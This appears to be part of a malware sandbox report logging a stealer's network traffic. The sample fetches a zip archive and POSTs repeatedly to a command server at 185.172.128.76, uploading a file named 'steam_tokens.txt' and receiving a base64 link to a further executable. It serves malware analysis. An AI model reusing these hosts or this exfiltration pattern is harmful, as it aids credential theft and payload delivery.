                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:37.308269978 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:37.616075993 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:37 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:37.923588991 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:38.232275963 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:38 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:38.293673992 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:38.601752996 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:38 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:38.648134947 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:38.954582930 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:38 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:38.959604025 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:39.267235041 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:39 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:39.304541111 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:39.607467890 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:39 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:39.629188061 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:39.935673952 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:39 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:39.967562914 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:40.283662081 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:40 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:41.426959991 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:41.729948997 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:41 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:42.150767088 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:42.455995083 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:42 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:42.467339993 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:42.779098034 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:42 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:42.784655094 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:43.090806007 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:43 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:43.096477032 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:43.403744936 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:43 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:43.411514044 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:43.707699060 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:43 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:43.714087963 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:44.416491985 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:43 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:44.421632051 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:44.728133917 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:44 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:44.734600067 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:45.036729097 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:44 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:45.042309999 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:45.343576908 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:45.349347115 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:45.658648968 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:45.663928032 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:45.970798969 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:45.976511002 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:46.280307055 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:46 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:46.286247969 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:46.588146925 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:46 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:46.596127033 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:46.902663946 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:46 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:46.910013914 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:47.216236115 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:47.238358021 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:47.535085917 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:47.594398975 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 363
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                      Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
                                                                                                                                                      Apr 27, 2024 02:20:47.897496939 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:48.043495893 CEST203OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 84915
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:48.640420914 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:48 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:50.783633947 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 268
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="message"her7h48r------JEGDGIIJJECFIDHJJKKF--
                                                                                                                                                      Apr 27, 2024 02:20:51.088959932 CEST223INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:51 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 52
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38
                                                                                                                                                      Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.449734176.97.76.106804312C:\Users\user\Desktop\TNQTc6Qmkg.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Apr 27, 2024 02:19:02.811662912 CEST185OUTGET /1/Package.zip HTTP/1.1
                                                                                                                                                      Host: note.padd.cn.com
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                      Apr 27, 2024 02:19:03.007100105 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:03:42 GMT
                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                      Content-Length: 3884863
                                                                                                                                                      Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      ETag: "66289c8a-3b473f"
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED]
                                                                                                                                                      Data Ascii: PK?XIbunch.dat\]: "*TN<wfX $;e)|u]+U*V~fRje@frVJ-#U*=TE5Z&z'k%Je[5PB@.Gz[*-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O*:J%o`f+OW>SINCm6|wQxkKoD:n4P>*M_|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF|)@W6Z79d'`_6zr%a*7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>*Z5(]
                                                                                                                                                      Apr 27, 2024 02:19:03.007158041 CEST1289INData Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a
